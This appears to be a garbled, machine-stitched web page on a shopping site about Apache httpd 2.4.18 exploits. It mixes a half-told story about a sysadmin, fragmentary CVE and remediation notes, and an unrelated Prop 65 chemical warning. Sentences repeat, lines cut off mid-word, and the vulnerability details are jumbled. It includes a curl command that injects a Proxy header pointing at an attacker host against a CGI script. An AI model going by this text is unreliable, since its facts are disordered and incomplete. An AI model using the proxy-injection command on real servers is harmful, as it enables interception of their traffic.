Login |
YOU HAVE 0 ITEMS IN YOUR SHOPPING CART |
WISH LIST
It was a typical Monday morning for John, a system administrator at a large financial institution. He was sipping his coffee and checking his email when he noticed a strange alert on his monitoring dashboard. The Apache httpd server, which hosted the company's website and several internal applications, was acting suspiciously.
curl -H "Proxy: http://attacker.com:8080" http://target/cgi-bin/api.php apache httpd 2.4.18 exploit
While it is no longer secure for production, it provides an "interesting review" of how web server vulnerabilities evolved from simple configuration errors to complex memory management issues. It was a typical Monday morning for John,
: In versions 2.4.37 and prior, sending request bodies in a "slow loris" fashion (extremely slowly) unnecessarily occupies server threads, leading to a DoS. Summary of Risks Requirement CVE-2019-0211 Privilege Escalation Local access + Graceful restart CVE-2017-9798 Information Disclosure Specific .htaccess config CVE-2019-9517 Denial of Service mod_http2 enabled Remediation curl -H "Proxy: http://attacker
The is notable in the security community primarily due to several high-profile vulnerabilities related to its implementation of the HTTP/2 (mod_http2) protocol and specific local privilege escalation flaws. Key Vulnerabilities & Exploit Reports HTTP/2 Denial of Service (CVE-2016-0150)
: Disable HTTP/2 by removing h2 and h2c from the configuration or upgrade. X.509 Certificate Bypass
WARNING: These products can potentially expose you to chemicals including Nickel, Chromium, Lead, Cobalt, Mercury and Beryllium, which are known to the state of California to cause cancer and/or birth defects or other reproductive harm. For more information, visit www.P65Warnings.ca.gov.
